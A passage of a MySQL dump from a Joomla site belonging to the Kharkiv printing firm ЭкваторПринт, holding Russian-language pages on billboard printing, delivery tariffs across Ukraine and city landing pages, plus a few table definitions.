привлекают повышенное внимание как прохожих, так и пассажиров;<br /><br /><strong>3. <span style=\"font-size: small;\">Рекламные объявления на бигбордах <span style=\"color: #0000ff;\">читаются очень часто</span>.</span></strong><br />Размещаясь  вдоль дороги, особенно вдоль магистралей с насыщенным автомобильным и  пешеходным движением, эти рекламные плакаты привлекают к себе внимание,  что делает печать билбордов очень рентабельной.<br /><br /><strong>4. <span style=\"font-size: small;\">Работа на <span style=\"color: #0000ff;\">конкретную целевую аудиторию</span> в определенном месте.</span></strong><br />Количество  откликов на рекламу повышается, если печать билбордов предполагает ее  последующее размещение там, где наиболее часто встречается целевая  аудитория.<br /><br /><strong>5. <span style=\"font-size: small;\"><span style=\"color: #0000ff;\">Небольшая стоимость</span> одного просмотра рекламного плаката.</span></strong><br />Разовая  печать бигбордов и дальнейшее их размещение в людных местах  обеспечивают стабильный приток ЦА, что повышает окупаемость рекламы.<br /><br /><strong>6. <span style=\"font-size: small;\">Наиболее <span style=\"color: #0000ff;\">удачное размещение</span> билбордов рядом с транспортными развязками.</span></strong><br />Печать  билбордов будет результативной, если поместить рекламный плакат в  людном месте. Кроме многочисленного потока людей, читаемость повышается  благодаря транспортным пробкам (люди начинают их читать, чтобы скоротать  время).<br /><br /><br /><br />Рекламные  плакаты увеличат круг ваших клиентов, заказать печать билбордов и  узнать подробности можно по контактным данным на странице <a href=\"index.php?option=com_content&amp;view=article&amp;id=3&amp;Itemid=4\" title=\"контакты - заказть печать билборда\">контакты</a></td>\r\n</tr>\r\n</tbody>\r\n</table>','',1,0,0,0,'2012-01-11 12:07:47',62,'','2015-11-03 07:57:21',62,0,'0000-00-00 00:00:00','2012-01-11 12:07:47','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',65,0,10,'печать бигбордов, печать билбордов','Широкоформатная печать билбордов (бигбордов) в Харькове с доставкой по всей Украине.',0,14699,'robots=\nauthor='),(19,'Доставка','2012-01-23-11-03-31','','<p style=\"text-align: center;\"><span style=\"font-size: medium;\"><span style=\"color: #ff0000;\">Доставка печатной продукции по всей Украине</span></span></p>\r\n<p style=\"text-align: center;\"><img src=\"images/stories/dostavka.jpg\" border=\"0\" alt=\"широкоформатная печать - доставка по Украине\" title=\"широкоформатная печать - доставка\" width=\"350\" style=\"float: left; margin: 10px; border: 0pt none;\" /><br />Компания \"ЭкваторПринт\" расположена в городе <a href=\"printing-in-kharkov/\"><strong>Харьков</strong></a>, <br />мы осуществляем доставку по всей Украине.</p>\r\n<p>Наиболее крупные города, в которых востребованы услуги широкоформатной печати:</p>\r\n<p>- <a href=\"printing-in-kyiv/\"><strong>Киев</strong></a><br />- <a href=\"printing-in-dnepropetrovsk/\"><strong>Днепропетровск</strong></a><br />- <a href=\"printing-in-zaporozhje/\"><strong>Запорожье</strong></a><br />- <a href=\"printing-in-odessa/\"><strong>Одесса</strong></a></p>\r\n<table style=\"width: 750px;\" border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<h2><strong>Доставка по Харькову</strong></h2>\r\n<p>Перед доставкой, наши менеджере непременно свяжутся с вами для согласования времени доставки.</p>\r\n<p><strong>Варианты доставки:</strong><span style=\"font-size: medium;\"><br />?</span> Самовывоз<span style=\"font-size: medium;\"><br />?</span> Новая Почта</p>\r\n<h2><strong>Доставка по Украине</strong></h2>\r\n<p>По Украине печатная продукция доставляется следующими курьерскими службами:</p>\r\n<p>- \"Автолюкс\" (http://www.autolux.ua)<br /> - \"Гюнсел\" (http://www.gunsel.com.ua)<br /> - \"Ночной экспресс\" (http://www.nexpress.com.ua)<br /> - \"Новая ПОЧТА\" (http://novaposhta.ua)</p>\r\n<p>Стоимость доставки оплачивает заказчик.<br />Тарифы и сроки доставки вы можете узнать на сайте курьерской службы.<br />Мы оформляем доставку только по факту полной оплаты стоимости печатной продукции.</p>\r\n<h2><strong>Способы оплаты</strong></h2>\r\n<p><strong>Наличная</strong></p>\r\n<p>Оплата наличными осуществляется при заказе печатной продукции в Харькове.<br />Оплата   производится в национальной валюте.<br />В подтверждение оплаты мы выдаем Вам товарный чек.</p>\r\n<p><strong>Безналичная</strong></p>\r\n<p>Безналичный расчет осуществляется при заказе продукции в любом регионе Украине, в том числе Харькове.<br /> После того как вы сделаете заказ на широкоформатную печать, мы вышлем вам счет фактуру по факсу или по e-mail.</p>\r\n<h2><strong>Стоимость</strong></h2>\r\n<p>Тарифы доставки. Подробную цену узнавайте у курьерских служб доставки.</p>\r\n<table class=\"tbl\" border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td>Кременчуг, Комсомольск, Лубны, Миргород, Полтава, Конотоп, Ахтырка, Сумы</td>\r\n<td class=\"tbl_td\">От 30грн.</td>\r\n</tr>\r\n<tr>\r\n<td>Днепродзержинск, Днепропетровск, Павлоград, Желтые Воды, Кривой Рог, Новомосковск, Полтавская область, Сумская область</td>\r\n<td class=\"tbl_td\">От 30грн.</td>\r\n</tr>\r\n<tr>\r\n<td>Винница, Днепропетровская область, Красноармейск, Енакиево, Константиновка, Краматорск, Горловка, Донецк, Артемовск, Славянск, Макеевка, Мариуполь, Горловка, Житомир, Бердичев, Новоград- Волынский, Запорожье, Ирпень, Обухов, Вишневое, Стоянка Киев, Белая Церковь, Борисполь, Боярка, Бровары, Вышгород, Фастов, Березань, Переяслав, Красный Луч, Ровеньки, Рубежное, Луганск, Алчевск, Антрацит, Лисичанск, Северодонецк, Стаханов, Николаев, Цюрупинск, Херсон, Новая Каховка, Умань, Смела, Черкассы, Золотоноша, Александрия, Кировоград, Светловодск, Нежин, Чернигов, Прилуки<br /></td>\r\n<td class=\"tbl_td\">От 35грн.</td>\r\n</tr>\r\n<tr>\r\n<td>Севастополь, Джанкой, Евпатория, Красноперекопск, Винницкая область, Луцк, Ковель, Владимир-Волынский, Донецкая область, Житомирская область, Запорожская область, Киевская область, Кировоградская область, Луганская область, Стрый, Червоноград (Львов), Новояворовск, Самбор, Львов, Дрогобыч, Николаевская область, Одесса, Ровно, Дубно, Сарны, Тернополь, Херсонская область, Каменец-Подольский, Хмельницкий, Дунаевцы, Черкасская область, Черновцы, Черновицкая область</td>\r\n<td class=\"tbl_td\">От 35грн.</td>\r\n</tr>\r\n<tr>\r\n<td>Луцк, Ковель, Владимир-Волынский, Хуст, Мукачево, Ужгород, Ивано-Франковск, Коломыя, Калуш, Львовская область, Одесская область, Ровенская область, Тернопольская область, Хмельницкая область, Черновицкая область</td>\r\n<td class=\"tbl_td\">От 35грн.</td>\r\n</tr>\r\n<tr>\r\n<td>Закарпатская область, Ивано-Франковская область</td>\r\n<td class=\"tbl_td\">От 40грн.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p> </p>\r\n<p><a href=\"/\" title=\"широкоформатная печать\">Широкоформатная печать</a> - перечень услуг</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<ul>\r\n<strong> </strong> \r\n</ul>','',1,0,0,0,'2012-01-23 10:58:09',62,'','2015-08-29 05:54:17',62,62,'2015-10-13 12:02:42','2012-01-23 10:58:09','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',45,0,9,'быстрая доставка широкоформатной печати','Доставка по всей Украине - продукции широкоформатной печати - 1-3 дня.',0,10763,'robots=\nauthor='),(20,'Широформатная печать в Днепропетровске — ЭкваторПринт','2014-01-14-09-22-57','','<h1>Заказать широкоформатную печать в Днепропетровске</h1>\r\n<p><span style=\"font-size: medium;\"><strong>Доставка Новой Почтой  в течение 2-3 дней</strong>.</span><br /> <span style=\"font-size: medium;\">Стоимость доставки <strong>от 14грн.</strong></span><br />(точную цену можно рассчитать на сайте перевозчка, итоговая цена зависит от габаритов и веса посылки).</p>\r\n<div class=\"margin_center\"><a class=\"bottom_yellow\" href=\"price\">Цены</a><a class=\"bottom_yellow\" href=\"contacts\">Заказать</a></div>\r\n<p><img src=\"images/stories/fy-3208g.jpg\" border=\"0\" title=\"Широформатная печать Днепропетровск\" width=\"344\" height=\"166\" style=\"float: left; border: 0px none; margin-left: 5px; margin-right: 5px;\" />Нужно разрекламировать товар или услугу без лишних денежных затрат? <strong><a>Широкоформатная печать рекламных объявлений</a> — правильный выбор</strong>.</p>\r\n<p>Идеальное соотношение стоимости и эффективности</p>\r\n<p>Эффективность уличной и интерьерной рекламы проверена временем. Такая реклама охватывает <strong>максимальное количество потенциальных клиентов</strong> и при этом не требует огромных денежных вливаний.</p>\r\n<p>Пожалуй, состязаться в эффективности с этим видом рекламной продукции могут только телевизионные рекламные ролики, но они вызывают у зрителей больше негатива, чем заинтересованности.</p>\r\n<h2>Широкоформатная печать очень востребована в Днепропетровске</h2>\r\n<p>В городе с развитой промышленностью и предпринимательской деятельностью. <strong>Качественный плакат — составляющая прибыльности.</strong></p>\r\n<p>От того, насколько профессионально составлено и отпечатано рекламное объявление будет зависеть прибыльность бизнеса. Ведь при грамотном подходе к созданию наружных и интерьерных рекламных плакатов можно добиться значительного расширения клиентской базы.</p>\r\n<h3>Заказать широкоформатную печать в Днепропетровске по телефонам:</h3>\r\n<p>+38(057) 737 25 33 <br />+38(099) 407-92-92<br />+38(098) 407-92-92<br />+38(093) 407-92-92</p>','',1,0,0,0,'2014-01-14 09:10:05',62,'','2014-01-30 12:39:10',62,0,'0000-00-00 00:00:00','2014-01-14 09:10:05','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',9,0,8,'','Широкоформатная печать в Днепропетровске: быстро, большой выбор рулонных материалов, сварка баннерной ткани - быстрая доставка в Днепропетровск.',0,726,'robots=\nauthor='),(27,'Видео','video','','<h1> Наши видеоматериалы </h1>\r\n\r\n<div style=\"display:inline-block;margin:20px 0px 20px 0px\">\r\n<div style=\"float:left; margin-right:10px\"> <iframe width=\"240\" height=\"180\" src=\"https://www.youtube.com/embed/gPBGj9g3b-E\" frameborder=\"0\" allowfullscreen></iframe>\r\n\r\n</div>\r\n<div style=\"float:left; margin-right:10px\">\r\n<iframe width=\"240\" height=\"180\" src=\"https://www.youtube.com/embed/WdfNRTw1nlw\" frameborder=\"0\" allowfullscreen></iframe>\r\n</div>\r\n<div style=\"float:right\"><iframe width=\"240\" height=\"180\" src=\"https://www.youtube.com/embed/KbMdSqMLzuU\" frameborder=\"0\" allowfullscreen></iframe>\r\n</div>\r\n</div>\r\n<div style=\"display:inline-block;margin:10px 0px 20px 0px\">\r\n<div style=\"float:left; margin-right:10px; width:240px; font-size:14px; font-weight:bold\"> Как поклеить пленку\r\n\r\n</div>\r\n<div style=\"float:left; margin-right:10px; width:240px; font-size:14px; font-weight:bold\">\r\n\r\nКак подготовить макет для печати\r\n</div>\r\n<div style=\"float:right; width:240px; font-size:14px; font-weight:bold\">Как перевести макеты из CorelDraw в TIF\r\n</div>\r\n</div>','',1,0,0,0,'2015-10-20 07:16:46',62,'','2015-11-11 09:34:27',62,62,'2015-11-11 09:34:28','2015-10-20 07:16:46','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',15,0,1,'','',0,343,'robots=\nauthor='),(21,'Широформатная печать в Одессе — ЭкваторПринт','2014-01-14-09-46-53','','<h1>Заказать широкоформатную печать в Одессе</h1>\r\n<p><span style=\"font-size: medium;\"><strong>Доставка Новой Почтой  в течение 2-3 дней</strong>.</span><br /> <span style=\"font-size: medium;\">Стоимость доставки <strong>от 15грн.</strong></span><br />(точную цену можно рассчитать на сайте перевозчка, итоговая цена зависит от габаритов и веса посылки).</p>\r\n<div class=\"margin_center\"><a class=\"bottom_yellow\" href=\"price\">Цены</a><a class=\"bottom_yellow\" href=\"contacts\">Заказать</a></div>\r\n<p><img src=\"images/stories/print.jpg\" border=\"0\" title=\"Широформатная печать Одесса\" style=\"float: left; margin-left: 5px; margin-right: 5px;\" />Желаете, чтобы о вашей компании узнало как можно больше потенциальных клиентов? Тогда заказывайте <a>широкоформатную печать</a> и размещайте рекламные плакаты в Одессе.</p>\r\n<p>Почему Одесса? Самый крупный портовый город Украины, третий по численности жителей и лучший по качеству жизни — это город-герой. Удачное местоположение, хорошо развитая промышленность и торговля создают благоприятные условия для развития предпринимательства в этом городе.</p>\r\n<h2>Широкоформатная печать очень востребована в Одессе</h2>\r\n<p>Удачная рекламная кампания — одна из важных составляющих успеха любого бизнеса, а широкоформатная печать — базовый элемент современной наружной и интерьерной рекламы. Яркие, красочные плакаты всевозможных размеров стали неотъемлемой частью каждого города, в том числе и Одессы.</p>\r\n<p>Множество людей, местных жителей и гостей Одессы видят рекламные объявления, расположенные на бигбордах и стенах зданий. Информация поступает к потенциальным клиентам и популярность товара или услуги растет с каждым днем. При этом цена за этот вид рекламы относительно невелика и даже мала.</p>\r\n<p>Хотите, чтобы о вас узнало как можно больше людей? Заказывайте широкоформатную печать.</p>\r\n<h3>Заказать широкоформатную печать</h3>\r\n<p>Наша компания <strong>Экваторпринт</strong> работает в сфере полиграфии уже много лет и за это время мы наработали богатый опыт по производству и оформлению рекламных плакатов. При необходимости наши специалисты дадут вам дельный совет как лучше оформить объявления, чтобы широкоформатная печать принесла весомый вклад в развитие вашего бизнеса.</p>\r\n<p>Оформляйте заказ на широкоформатную печать в нашей полиграфии Экваторпринт и тогда ?</p>\r\n<ul>\r\n<li>на вас будет работать наша собственная современная технологическая база</li>\r\n<li>ваш заказ будет выполнен оперативно</li>\r\n<li>широкоформатная печать будет осуществляться на самых лучших материалах</li>\r\n<li>все ваши пожелания и требования будут учтены</li>\r\n<li>вы будете приятно удивлены скоростью и высоким качеством исполнения заказа</li>\r\n</ul>\r\n<p><strong>Узнавайте подробности оформления заказа, позвонив по телефонам:</strong></p>\r\n<p>+38(057) 737 25 33 <br />+38(099) 407-92-92<br />+38(098) 407-92-92<br />+38(093) 407-92-92</p>','',1,0,0,0,'2014-01-14 09:40:22',62,'','2014-01-30 12:38:52',62,62,'2014-01-30 12:38:52','2014-01-14 09:40:22','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',17,0,7,'','Широкоформатная печать в Одессе: быстро, большой выбор рулонных материалов, сварка баннерной ткани - быстрая доставка в Одессу.',0,775,'robots=\nauthor='),(25,'Широкоформатная печать в Харькове — ЭкваторПринт','2014-01-30-11-50-48','','<h1>Заказать широкоформатную печать в Харькове</h1>\r\n<p><strong>Доставка по Харькову доставка осуществляется:</strong></p>\r\n<p><strong>с 9:00 до 19:00</strong> - в рабочие дни<br /><strong>с 10:00 до 15:00</strong> - в субботу</p>\r\n<p>Перед доставкой, наши менеджере непременно свяжутся с вами для согласования времени доставки.</p>\r\n<p><strong>Варианты доставки:</strong><span style=\"font-size: medium;\"><br />?</span> Самовывоз<span style=\"font-size: medium;\"><br />?</span> Курьером</p>\r\n<p><strong>Стоимость доставки курьером по Харькову</strong> - 50 грн.</p>\r\n<div class=\"margin_center\"><a class=\"bottom_yellow\" href=\"price\" title=\"Цена широкоформтаной печати Харьков\">Цены</a><a class=\"bottom_yellow\" href=\"contacts\" title=\"Заказть широкоформатную печать \">Заказать</a></div>\r\n<p><img src=\"images/stories/shirokoformatnaya_pechat_kharkov.jpg\" border=\"0\" alt=\"Широкоформатная печать в Харькове\" width=\"300\" height=\"158\" style=\"float: left; margin-left: 5px; margin-right: 5px;\" />Сегодня ни один город не обходится без уличных и интерьерных рекламных объявлений и Харьков — не исключение.</p>\r\n<p>В таком крупном городе, втором по численности населения среди городов Украины, широкоформатная печать стала одним из <strong>самых эффективных</strong> рекламных средств. Еще бы, яркие рекламные плакаты, расположенные вдоль дорог просто <strong>«попадаются на глаза»</strong>: их видят тысячи людей в день. Бесспорно, такие сообщения достигнут сердец своей целевой аудитории, пребывающей в Харькове.</p>\r\n<p>И не только высокая эффективность числится в достоинствах этого метода.</p>\r\n<p>Широкоформатная печать не требует баснословных капиталовложений — это эффективный, но недорогой способ разрекламировать товар или услугу.</p>\r\n<h2>Широкоформатная печать очень востребована в Харькове</h2>\r\n<p>Наша полиграфия \"ЭкваторПринт\" выполняет заказы на создание различной печатной продукции.</p>\r\n<p>Ваш заказ будет исполнен в <strong>минимальные сроки</strong> и качество исполнения при этом будет <strong>отменным</strong>.</p>\r\n<p>Мы можем так говорить, потому что все заказы выполняются на собственном современном оборудовании по передовым технологиям. Мы заинтересованы в высоком качестве продукции и строго следим за процессом исполнения ваших плакатов.</p>\r\n<p>Доверьте свой успех опытным мастерам, заказывайте широкоформатную печать <strong>в полиграфии \"ЭкваторПринт\"</strong> и получайте его в считанные дни.</p>\r\n<p>На ваши вопросы обязательно ответят опытные специалисты, звоните им по телефонным номерам:</p>\r\n<ul>\r\n<li><strong>38 (057) 737 25 33</strong></li>\r\n<li><strong>38 (098) 407-92-92</strong></li>\r\n<li><strong>38 (099) 407-92-92</strong></li>\r\n<li><strong>38 (093) 407-92-92</strong></li>\r\n</ul>','',1,0,0,0,'2014-01-30 11:41:06',62,'','2014-03-18 08:01:54',62,62,'2015-11-03 07:43:17','2014-01-30 11:41:06','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',6,0,3,'широкоформатная печать Харьков','Широкоформатная печать в Харькове в ЭкваторПринт - центр Харькова, Метро Спортивная. Выгодная цена. Печать заказа за 1-2 дня. Есть все материалы для печати больших размеров разного назначения.',0,867,'robots=\nauthor='),(22,'Широкоформатная печать в Киеве — ЭкваторПринт','2014-01-30-10-17-30','','<h1>Заказать широкоформатную печать в Киеве</h1>\r\n<p><span style=\"font-size: medium;\"><strong>Доставка Новой Почтой  в течение 2-3 дней</strong>.</span><br /> <span style=\"font-size: medium;\">Стоимость доставки <strong>от 15грн.</strong></span><br />(точную цену можно рассчитать на сайте перевозчка, итоговая цена зависит от габаритов и веса посылки).</p>\r\n<div class=\"margin_center\"><a class=\"bottom_yellow\" href=\"price\">Цены</a><a class=\"bottom_yellow\" href=\"contacts\">Заказать</a></div>\r\n<p><img src=\"images/stories/shirokoformatnaya_pechat_kyiv.png\" border=\"0\" alt=\"Широкоформатная печать в Киеве\" width=\"300\" height=\"248\" style=\"float: left; margin-left: 5px; margin-right: 5px;\" />Нужна недорогая реклама продукции или услуг в Киеве? Хотите признаться в любви необычным способом или кого-то близкого поздравить с праздником?</p>\r\n<p>Широкоформатная печать донесет ваше сообщение жителям Киева.</p>\r\n<h2>Реклама и широкоформатная печать в Киеве</h2>\r\n<p>Широкоформатная печать изображений, как правило, используется с целью создания плакатов для <strong>наружной и внутренней рекламы</strong> продукции или услуг. Этот способ также часто используется для воплощения интерьерных решений, и значительно реже — для личных сообщений, например для признания в любви, поздравления с праздником и т.п.</p>\r\n<p>По эффективности рекламная кампания, проведенная посредством полиграфии, превосходит телевизионные рекламные ролики, во время которых многие идут пить кофе или решают другие проблемы.</p>\r\n<h3>Широкоформатная печать очень востребована в Киеве</h3>\r\n<p>Заказывайте печать больших и маленьких изображений в нашей полиграфии \"ЭкваторПринт\".</p>\r\n<p>Выполнение печатных работ осуществляется на основе ваших макетов или же наши специалисты подготовят все необходимое по вашему заказу. Опытные мастера \"ЭкваторПринт\" дадут рекомендации, позволяющие получить оптимальный результат.</p>\r\n<p>Собственное современное оборудование, богатый опыт, квалифицированные сотрудники — основа создания качественного плаката для наружной или внутренней рекламы в \"ЭкваторПринт\".</p>\r\n<p>Заказывайте исполнение полиграфических работ в нашей компании \"ЭкваторПринт\" и радуйтесь успешности своего бизнеса.</p>\r\n<p><strong>Звоните, чтобы уточнить детали и заказать создание рекламного плаката по телефонным номерам:</strong></p>\r\n<ul>\r\n<li><strong>38 (057) 737 25 33</strong></li>\r\n<li><strong>38 (098) 407-92-92</strong></li>\r\n<li><strong>38 (099) 407-92-92</strong></li>\r\n<li><strong>38 (093) 407-92-92</strong></li>\r\n</ul>','',1,0,0,0,'2014-01-30 10:05:21',62,'','2014-01-30 12:38:34',62,62,'2014-01-30 12:38:36','2014-01-30 10:05:21','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',3,0,6,'','Широкоформатная печать в Киеве: быстро, большой выбор рулонных материалов, сварка баннерной ткани - быстрая доставка в Киев.',0,777,'robots=\nauthor='),(23,'Широформатная печать в Запорожье — ЭкваторПринт','2014-01-30-11-21-52','','<h1>Заказать широкоформатную печать в Запорожье</h1>\r\n<p><span style=\"font-size: medium;\"><strong>Доставка Новой Почтой  в течение 2-3 дней</strong>.</span><br /> <span style=\"font-size: medium;\">Стоимость доставки <strong>от 15грн.</strong></span><br />(точную цену можно рассчитать на сайте перевозчка, итоговая цена зависит от габаритов и веса посылки).</p>\r\n<div class=\"margin_center\"><a class=\"bottom_yellow\" href=\"price\">Цены</a><a class=\"bottom_yellow\" href=\"contacts\">Заказать</a></div>\r\n<p>Запорожье — большой промышленный город, поэтому очень важно, чтобы реклама товара и услуг была <strong>максимально эффективной</strong>. Достичь желаемого результата при проведении рекламных акций поможет широкоформатная печать.</p>\r\n<h2>Достоинства широкоформатной печати в Запорожье</h2>\r\n<p><img src=\"images/stories/shirokoformatnaya_pechat_zaporoje.jpg\" border=\"0\" alt=\"Широформатная печать в Запорожье\" width=\"300\" height=\"212\" style=\"float: left; border: 0px none; margin-left: 5px; margin-right: 5px;\" />Широкоформатная печать позволяет создавать уникальные, красочные изображения, рассказывающие потенциальным клиентам о вашем товаре. Многоречивые баннеры, установленные вдоль дорог, охватывают максимальную аудиторию. А это значит, что про вас узнает большинство жителей Запорожья.</p>\r\n<p>Стоимость такой рекламы по сравнению с другими видами (например, с рекламой по телевидению) <strong>относительно низкая</strong>, а эффективность высокая. Заплатив один раз за создание плаката, вам нужно будет доплатить за размещение. И тогда, на протяжении многих дней, уже без оплаты, ваше сообщение круглосуточно будет рассказывать о вашем товаре, привлекая все новых клиентов.</p>\r\n<h3>Широкоформатная печать очень востребована в Запорожье</h3>\r\n<p><strong>Полиграфия \"ЭкваторПринт\"</strong> принимает заказы на широкоформатную печать от жителей красивого города Запорожье.</p>\r\n<p>Стоимость осуществления работ зависит от размера и метода нанесения изображения, а также других факторов. Цена рассчитывается для каждого заказа индивидуально.</p>\r\n<p>Мы строго следим за соблюдением сроков выполнения заказа, собственное оборудование позволяет все работы выполнять качественно и в срок.</p>\r\n<p><strong>Звоните менеджерам по телефонным номерам</strong>, узнавайте интересующие вас детали и заказывайте широкоформатную печать, которая расскажет всем жителям Запорожья о вашей продукции или услуге:</p>\r\n<ul>\r\n<li><strong>38 (057) 737 25 33</strong></li>\r\n<li><strong>38 (098) 407-92-92</strong></li>\r\n<li><strong>38 (099) 407-92-92</strong></li>\r\n<li><strong>38 (093) 407-92-92</strong></li>\r\n</ul>','',1,0,0,0,'2014-01-30 11:06:03',62,'','2014-01-30 12:38:17',62,62,'2014-01-30 12:38:17','2014-01-30 11:06:03','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',3,0,5,'','Широкоформатная печать в Запорожье: быстро, большой выбор рулонных материалов, сварка баннерной ткани - быстрая доставка в Запорожье.',0,674,'robots=\nauthor='),(24,'Широкоформатная печать в Донецке — ЭкваторПринт','2014-01-30-11-32-00','','<h1>Заказать широкоформатную печать в Донецке</h1>\r\n<p><span style=\"font-size: medium;\"><strong>Доставка Новой Почтой  в течение 2-3 дней</strong>.</span><br /> <span style=\"font-size: medium;\">Стоимость доставки <strong>от 15грн.</strong></span><br />(точную цену можно рассчитать на сайте перевозчка, итоговая цена зависит от габаритов и веса посылки).</p>\r\n<div class=\"margin_center\"><a class=\"bottom_yellow\" href=\"price\">Цены</a><a class=\"bottom_yellow\" href=\"contacts\">Заказать</a></div>\r\n<p>Донецк — город, занимающий пятое место по количеству населения среди украинских городов. В Донецке хорошо развита промышленность и предпринимательская деятельность. Поэтому все бизнесмены стремятся проводить рекламные кампании с максимальной эффективностью. А это не возможно без наружной и интерьерной рекламы, охватывающей максимальную аудиторию.</p>\r\n<h2>Широкоформатная печать — залог успеха</h2>\r\n<p><strong><img src=\"images/stories/shirokoformatnaya_pechat_doneck.jpg\" border=\"0\" alt=\"Широкоформатная печать в Донецке\" width=\"300\" height=\"178\" style=\"float: left; margin-left: 5px; margin-right: 5px;\" />Полиграфия \"ЭкваторПринт\"</strong> тесно сотрудничает с предпринимателями, организациями и обычным населением, выполняя заказы на создание рекламных изображений и плакатов личной тематики.</p>\r\n<p>В арсенале \"ЭкваторПринт\":</p>\r\n<ul>\r\n<li>собственная печатная база,</li>\r\n<li>богатый опыт</li>\r\n<li>квалифицированные сотрудники</li>\r\n</ul>\r\n<p>Такая основа позволяет все заказы исполнять на высшем уровне и <strong>точно в оговоренный срок</strong>. Мы не знаем, что такое не вовремя выполненная работа, хотя сроки изготовления заказа — минимальны. После составления договора и подготовки предпечатного пакета документов ваш заказ сразу отправляется в типографию.</p>\r\n<h3>Широкоформатная печать очень востребована в Донецке</h3>\r\n<p>Ваш заказ будет выполнен в кратчайшие сроки и на высшем уровне, если за дело возьмутся наши специалисты.</p>\r\n<p><strong>Звоните менеджерам</strong> — они ответят на ваши вопросы, касающиеся метода широкоформатной печати в Донецке, и заказывайте исполнение печатных работ:</p>\r\n<ul>\r\n<li><strong>38 (057) 737 25 33</strong></li>\r\n<li><strong>38 (098) 407-92-92</strong></li>\r\n<li><strong>38 (099) 407-92-92</strong></li>\r\n<li><strong>38 (093) 407-92-92</strong></li>\r\n</ul>','',1,0,0,0,'2014-01-30 11:27:42',62,'','2014-01-30 12:39:54',62,0,'0000-00-00 00:00:00','2014-01-30 11:27:42','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',4,0,4,'','Широкоформатная печать в Донецке: быстро, большой выбор рулонных материалов, сварка баннерной ткани - быстрая доставка в Донецк.',0,683,'robots=\nauthor=');
/*!40000 ALTER TABLE `jos_content` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_content_frontpage`
--

DROP TABLE IF EXISTS `jos_content_frontpage`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_content_frontpage` (
  `content_id` int(11) NOT NULL DEFAULT '0',
  `ordering` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`content_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_content_frontpage`
--

LOCK TABLES `jos_content_frontpage` WRITE;
/*!40000 ALTER TABLE `jos_content_frontpage` DISABLE KEYS */;
INSERT INTO `jos_content_frontpage` VALUES (4,1);
/*!40000 ALTER TABLE `jos_content_frontpage` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_content_rating`
--

DROP TABLE IF EXISTS `jos_content_rating`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_content_rating` (
  `content_id` int(11) NOT NULL DEFAULT '0',
  `rating_sum` int(11) unsigned NOT NULL DEFAULT '0',
  `rating_count` int(11) unsigned NOT NULL DEFAULT '0',
  `lastip` varchar(50) NOT NULL DEFAULT '',
  PRIMARY KEY (`content_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_content_rating`
--

LOCK TABLES `jos_content_rating` WRITE;
/*!40000 ALTER TABLE `jos_content_rating` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_content_rating` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_core_acl_aro`
--

DROP TABLE IF EXISTS `jos_core_acl_aro`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_core_acl_aro` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `section_value` varchar(240) NOT NULL DEFAULT '0',
